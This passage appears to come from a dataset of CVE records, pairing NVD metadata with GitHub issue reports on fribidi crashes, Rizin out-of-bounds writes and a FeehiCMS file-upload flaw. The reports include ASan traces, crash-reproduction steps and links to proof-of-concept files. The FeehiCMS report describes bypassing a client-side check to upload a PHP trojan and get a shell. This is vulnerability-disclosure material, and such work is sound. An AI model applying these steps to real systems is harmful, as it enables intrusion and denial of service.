[0x615000000080,0x615000000280) allocated by thread T0 here: #0 0x7f7d601f9b40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40) #1 0x559f11680853 in init_cap_rtl (/home/lin/fribidi/bin/fribidi+0xf853) #2 0x559f116812b0 in fribidi_cap_rtl_to_unicode (/home/lin/fribidi/bin/fribidi+0x102b0) #3 0x559f1168019e in fribidi_charset_to_unicode (/home/lin/fribidi/bin/fribidi+0xf19e) #4 0x559f11676b5e in main (/home/lin/fribidi/bin/fribidi+0x5b5e) #5 0x7f7d5fd4bbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/lin/fribidi/bin/fribidi+0x108fe) in fribidi_cap_rtl_to_unicode Shadow bytes around the buggy address: 0x0c2a7fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c2a7fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] 0x0c2a7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a7fff8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a7fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a7fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2a7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==10552==ABORTING ``` poc: [poc.zip](https://github.com/fribidi/fribidi/files/7761411/poc.zip) Thanks !!!
heap-buffer-overflow (/home/lin/fribidi/bin/fribidi+0x108fe) in fribidi_cap_rtl_to_unicode
https://api.github.com/repos/fribidi/fribidi/issues/182/comments
3
2021-12-22T09:07:41Z
2022-04-19T19:55:33Z
https://github.com/fribidi/fribidi/issues/182
1,086,608,926
182
4,096
CVE-2022-25310
2022-09-06T18:15:11.557
A segmentation fault (SEGV) flaw was found in the Fribidi package and affects the fribidi_remove_bidi_marks() function of the lib/fribidi.c file. This flaw allows an attacker to pass a specially crafted file to Fribidi, leading to a crash and causing a denial of service.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2022-25310" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2047923" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/fribidi/fribidi/issues/183" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/fribidi/fribidi/pull/186" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2022-25310" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2047923" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/fribidi/fribidi/issues/183" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/fribidi/fribidi/pull/186" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:fribidi:*:*:*:*:*:*:*:*", "matchCriteriaId": "A9E50E4E-F644-4B2F-8972-60E055F52B68", "versionEndExcluding": "1.0.12", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/fribidi/fribidi/issues/183
[ "Exploit", "Third Party Advisory" ]
github.com
[ "fribidi", "fribidi" ]
Hi, I found a bug, SEGV. - SUMMARY: SUMMARY: AddressSanitizer: SEGV (/home/lin/fribidi/bin/fribidi+0x66a5) in fribidi_remove_bidi_marks - Version ``` ➜ bin git:(master) ✗ ./fribidi --version fribidi (GNU FriBidi) 1.0.11 interface version 4, Unicode Character Database version 14.0.0, Configure options. Copyright (C) 2004 Sharif FarsiWeb, Inc. Copyright (C) 2001, 2002, 2004, 2005 Behdad Esfahbod Copyright (C) 1999, 2000, 2017, 2018, 2019 Dov Grobgeld GNU FriBidi comes with NO WARRANTY, to the extent permitted by law. You may redistribute copies of GNU FriBidi under the terms of the GNU Lesser General Public License. For more information about these matters, see the file named COPYING. Written by Behdad Esfahbod and Dov Grobgeld ``` At branch 859aa1b - Steps to reproduce ``` git clone https://github.com/fribidi/fribidi.git cd fribidi ./autogen.sh CFLAGS=-fsanitize=address ./configure --disable-shared make ./bin/fribidi --test --novisual --basedir ./poc ``` - Platform ``` ➜ bin git:(master) ✗ gcc --version gcc (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0 Copyright (C) 2017 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. ➜ bin git:(master) ✗ uname -r 5.4.0-91-generic ➜ bin git:(master) ✗ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 18.04.5 LTS Release: 18.04 Codename: bionic ``` - ASAN ``` ➜ fribidi git:(master) ✗ ./bin/fribidi --test --novisual --basedir ~/id:000194,sig:06,src:001474,op:arg1,rep:4 ASAN:DEADLYSIGNAL ================================================================= ==10834==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55cc8b6086a6 bp 0x7ffed6538790 sp 0x7ffed6538740 T0) ==10834==The signal is caused by a READ memory access. ==10834==Hint: address points to the zero page. #0 0x55cc8b6086a5 in fribidi_remove_bidi_marks (/home/lin/fribidi/bin/fribidi+0x66a5) #1 0x55cc8b607d17 in main (/home/lin/fribidi/bin/fribidi+0x5d17) #2 0x7f41e828cbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #3 0x55cc8b606d29 in _start (/home/lin/fribidi/bin/fribidi+0x4d29) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/home/lin/fribidi/bin/fribidi+0x66a5) in fribidi_remove_bidi_marks ==10834==ABORTING ``` poc: [poc.zip](https://github.com/fribidi/fribidi/files/7761436/poc.zip) Thanks !!!
SEGV on unknown address 0x000000000000 (pc 0x55cc8b6086a6 bp 0x7ffed6538790 sp 0x7ffed6538740 T0)
https://api.github.com/repos/fribidi/fribidi/issues/183/comments
1
2021-12-22T09:10:25Z
2022-03-30T19:03:07Z
https://github.com/fribidi/fribidi/issues/183
1,086,611,188
183
4,097
CVE-2020-21516
2022-09-06T19:15:08.290
There is an arbitrary file upload vulnerability in FeehiCMS 2.0.8 at the head image upload, that allows attackers to execute relevant PHP code.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/liufee/cms/issues/46" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/liufee/cms/issues/46" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:feehi:feehicms:2.0.8:*:*:*:*:*:*:*", "matchCriteriaId": "4AEB1B4F-33FF-4363-BB98-B7151666907B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/liufee/cms/issues/46
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "liufee", "cms" ]
There is an arbitrary file upload vulnerability in the background avatar upload. The CMS only verified the suffix of the file in the front end by js, and we found that we could upload the PHP scripts directly after using Burp Suite for package capture modification. ![1](https://user-images.githubusercontent.com/50016287/70156592-21e6f380-16ef-11ea-8670-b4f167c53f7c.png) The attacker can modify the box in the picture and upload the PHP script directly, It also returns the upload path(In the red box on the right of the figure above). When the PHP file content is a Trojan, attackers can get the shell directly. Here I used Behinder as a shell management tool, and getshell successfully. ![2](https://user-images.githubusercontent.com/50016287/70157118-f4e71080-16ef-11ea-9945-bc106298e259.png) ![3](https://user-images.githubusercontent.com/50016287/70157473-9cfcd980-16f0-11ea-96dd-f3f13bcfec96.png) ![4](https://user-images.githubusercontent.com/50016287/70157477-9e2e0680-16f0-11ea-97be-6c5e2bf9144f.png)
Feehicms-2.0.8 can be attacked directly to getshell via the avatar uploads
https://api.github.com/repos/liufee/cms/issues/46/comments
1
2019-12-04T15:49:47Z
2019-12-24T15:56:11Z
https://github.com/liufee/cms/issues/46
532,772,076
46
4,098
CVE-2022-36039
2022-09-06T19:15:08.603
Rizin is a UNIX-like reverse engineering framework and command-line toolset. Versions 0.4.0 and prior are vulnerable to out-of-bounds write when parsing DEX files. A user opening a malicious DEX file could be affected by this vulnerability, allowing an attacker to execute code on the user's machine. A patch is available on the `dev` branch of the repository.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/commit/1524f85211445e41506f98180f8f69f7bf115406" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/issues/2969" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/security/advisories/GHSA-pr85-hv85-45pg" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202209-06" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/commit/1524f85211445e41506f98180f8f69f7bf115406" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/issues/2969" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/security/advisories/GHSA-pr85-hv85-45pg" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202209-06" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rizin:rizin:*:*:*:*:*:*:*:*", "matchCriteriaId": "5E797DF4-7DCA-46AA-9A36-5C0064FE79CA", "versionEndExcluding": null, "versionEndIncluding": "0.4.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/rizinorg/rizin/issues/2969
[ "Third Party Advisory" ]
github.com
[ "rizinorg", "rizin" ]
Hi! We've been fuzzing your project and found the following errors in `librz/bin/format/dex/dex.c` ### Work environment OS: Ubuntu 20.04 File format: - rizin version: https://github.com/rizinorg/rizin/commit/4b385978a1a33252c4f829d3db59fb3056afadb9 ### Bug description 1. Heap out-of-bounds write of size 1 in `dex.c:89:13`, Crash file: [crash-b28a51055078fc0271ab6fb59956f709.zip](https://github.com/rizinorg/rizin/files/9394333/crash-b28a51055078fc0271ab6fb59956f709.zip) 2. Heap out-of-bounds write of size 1 in `dex.c:905:35`, Crash file: [crash-dedb83bc9e05fc8c518e1fe7cb917a1fe77849be.zip](https://github.com/rizinorg/rizin/files/9394336/crash-dedb83bc9e05fc8c518e1fe7cb917a1fe77849be.zip) ### Steps to reproduce 1. Build docker container from https://github.com/ispras/oss-sydr-fuzz/tree/master/projects/rizin: `sudo docker build -t oss-sydr-fuzz-rizin .` 2. Run docker container: `sudo docker run --privileged --network host -v /etc/localtime:/etc/localtime:ro --rm -it -v $PWD:/fuzz oss-sydr-fuzz-rizin /bin/bash` 3. Execute rizin with crashing input (1): `/rizin-fuzzing/libfuzzer-asan/bin/rizin -qq crash-b28a51055078fc0271ab6fb59956f709` 4. You will see the following output: ``` ================================================================= ==2537255==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020001ae98f at pc 0x000000b9ce28 bp 0x7ffd1f577e70 sp 0x7ffd1f577e68 WRITE of size 1 at 0x6020001ae98f thread T0 #0 0xb9ce27 in dex_string_new /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:89:13 #1 0xb9ce27 in dex_parse /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:545:23 #2 0xb9ce27 in rz_bin_dex_new /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:703:7 #3 0xb09545 in load_buffer /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/p/bin_dex.c:42:18 #4 0xae7004 in rz_bin_object_new /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bobj.c:300:8 #5 0xad7d31 in rz_bin_file_new_from_buffer /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bfile.c:150:19 #6 0xadf3c7 in rz_bin_open_buf /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bin.c:272:8 #7 0xadec27 in rz_bin_open_io /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bin.c:330:18 #8 0x1003353 in core_file_do_load_for_io_plugin /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/core/cfile.c:727:23 #9 0x1003353 in rz_core_bin_load /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/core/cfile.c:974:4 #10 0x5b9af8 in rz_main_rizin /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/main/rizin.c:1119:14 #11 0x7f151165f082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #12 0x41da3d in _start (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x41da3d) 0x6020001ae98f is located 1 bytes to the left of 1-byte region [0x6020001ae990,0x6020001ae991) allocated by thread T0 here: #0 0x498c9d in malloc (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x498c9d) #1 0xb9805e in dex_string_new /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:84:9 #2 0xb9805e in dex_parse /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:545:23 #3 0xb9805e in rz_bin_dex_new /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:703:7 #4 0xb09545 in load_buffer /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/p/bin_dex.c:42:18 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:89:13 in dex_string_new Shadow bytes around the buggy address: 0x0c048002dce0: fa fa fd fa fa fa fd fa fa fa 02 fa fa fa fd fa 0x0c048002dcf0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd 0x0c048002dd00: fa fa fd fa fa fa fd fa fa fa fd fa fa fa 00 00 0x0c048002dd10: fa fa 01 fa fa fa 01 fa fa fa 01 fa fa fa 01 fa 0x0c048002dd20: fa fa 01 fa fa fa 01 fa fa fa 01 fa fa fa 01 fa =>0x0c048002dd30: fa[fa]01 fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c048002dd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c048002dd50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c048002dd60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c048002dd70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c048002dd80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2537255==ABORTING ``` 5. Execute rizin with crashing input (2): `/rizin-fuzzing/libfuzzer-asan/bin/rizin -qq crash-dedb83bc9e05fc8c518e1fe7cb917a1fe77849be` 6. You will see the following output: ``` ================================================================= ==2537994==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020001aedcf at pc 0x000000ba19c6 bp 0x7ffde55982e0 sp 0x7ffde55982d8 WRITE of size 1 at 0x6020001aedcf thread T0 #0 0xba19c5 in dex_resolve_library /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:905:35 #1 0xba19c5 in rz_bin_dex_symbols /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:1326:20 #2 0xae7bf4 in rz_bin_object_set_items /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bobj.c:455:16 #3 0xae706b in rz_bin_object_new /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bobj.c:319:2 #4 0xad7d31 in rz_bin_file_new_from_buffer /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bfile.c:150:19 #5 0xadf3c7 in rz_bin_open_buf /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bin.c:272:8 #6 0xadec27 in rz_bin_open_io /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/bin.c:330:18 #7 0x1003353 in core_file_do_load_for_io_plugin /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/core/cfile.c:727:23 #8 0x1003353 in rz_core_bin_load /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/core/cfile.c:974:4 #9 0x5b9af8 in rz_main_rizin /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/main/rizin.c:1119:14 #10 0x7f471e6ef082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #11 0x41da3d in _start (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x41da3d) 0x6020001aedcf is located 1 bytes to the left of 1-byte region [0x6020001aedd0,0x6020001aedd1) allocated by thread T0 here: #0 0x484594 in strdup (/home/madrat/Desktop/rizin-report/rz-installation-asan/bin/rizin+0x484594) #1 0xba1747 in dex_resolve_library /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:903:20 #2 0xba1747 in rz_bin_dex_symbols /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:1326:20 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/dex/dex.c:905:35 in dex_resolve_library Shadow bytes around the buggy address: 0x0c048002dd60: fa fa 00 06 fa fa 00 06 fa fa fd fa fa fa 07 fa 0x0c048002dd70: fa fa 01 fa fa fa fd fa fa fa fd fa fa fa 06 fa 0x0c048002dd80: fa fa 01 fa fa fa 00 fa fa fa 02 fa fa fa 01 fa 0x0c048002dd90: fa fa 00 fa fa fa 07 fa fa fa 01 fa fa fa 00 fa 0x0c048002dda0: fa fa 07 fa fa fa 01 fa fa fa 00 fa fa fa 07 fa =>0x0c048002ddb0: fa fa 06 fa fa fa 02 fa fa[fa]01 fa fa fa fa fa 0x0c048002ddc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c048002ddd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c048002dde0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c048002ddf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c048002de00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2537994==ABORTING ```
Multiple heap out-of-bounds writes in dex.c
https://api.github.com/repos/rizinorg/rizin/issues/2969/comments
0
2022-08-22T12:33:13Z
2022-08-24T00:26:41Z
https://github.com/rizinorg/rizin/issues/2969
1,346,339,356
2,969
4,099
CVE-2022-36040
2022-09-06T20:15:08.603
Rizin is a UNIX-like reverse engineering framework and command-line toolset. Versions 0.4.0 and prior are vulnerable to an out-of-bounds write when getting data from PYC(python) files. A user opening a malicious PYC file could be affected by this vulnerability, allowing an attacker to execute code on the user's machine. Commit number 68948017423a12786704e54227b8b2f918c2fd27 contains a patch.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/commit/68948017423a12786704e54227b8b2f918c2fd27" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/issues/2963" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/security/advisories/GHSA-h897-rhm9-rpmw" }, { "source": "security-advisories@github.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WQZLMHEI5D7EJASA5UW6XN4ODHLRHK6N/" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202209-06" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/commit/68948017423a12786704e54227b8b2f918c2fd27" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/issues/2963" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rizinorg/rizin/security/advisories/GHSA-h897-rhm9-rpmw" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WQZLMHEI5D7EJASA5UW6XN4ODHLRHK6N/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202209-06" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rizin:rizin:*:*:*:*:*:*:*:*", "matchCriteriaId": "5E797DF4-7DCA-46AA-9A36-5C0064FE79CA", "versionEndExcluding": null, "versionEndIncluding": "0.4.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/rizinorg/rizin/issues/2963
[ "Third Party Advisory" ]
github.com
[ "rizinorg", "rizin" ]
Hi! We've been fuzzing your project and found the following errors in `librz/bin/format/pyc/marshal.c` ### Work environment OS: Ubuntu 20.04 File format: - rizin version: https://github.com/rizinorg/rizin/commit/4b385978a1a33252c4f829d3db59fb3056afadb9 ### Bug description Heap out-of-bounds write (segv) of size 1 in `librz/bin/format/pyc/marshal.c:345` and `librz/bin/format/pyc/marshal.c:366` ### Steps to reproduce 1. Build docker container from https://github.com/ispras/oss-sydr-fuzz/tree/master/projects/rizin: `sudo docker build -t oss-sydr-fuzz-rizin .` 2. Run docker container: `sudo docker run --privileged --network host -v /etc/localtime:/etc/localtime:ro --rm -it -v $PWD:/fuzz oss-sydr-fuzz-rizin /bin/bash` 3. Execute rizin with crashing input (1) (we sent all crashing inputs to you by email): `/rizin-fuzzing/libfuzzer-asan/bin/rizin -qq crash-29b84af05a36d9628093200a1a07b7d931009c84` 4. Execute rizin with crashing input (2): `/rizin-fuzzing/libfuzzer-asan/bin/rizin -qq crash-490d344f047c5223f5bfe701dfb406ca2a00710d` 5. You will see the following output (for the first crashing input, the second one is similar): ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==2489412==ERROR: AddressSanitizer: SEGV on unknown address 0x6021001ae90f (pc 0x000000d0fdf8 bp 0x7ffde0cc5c90 sp 0x7ffde0cc5ac0 T0) ==2489412==The signal is caused by a WRITE memory access. #0 0xd0fdf8 in get_complex_object /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/pyc/marshal.c:345:9 #1 0xd0fdf8 in get_object /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/pyc/marshal.c:1083:9 #2 0xd1159a in get_array_object_generic /home/madrat/Desktop/rizin-report/rizin/build-asan/../librz/bin/format/pyc/marshal.c:494:9 #3 0xd0dd06 in 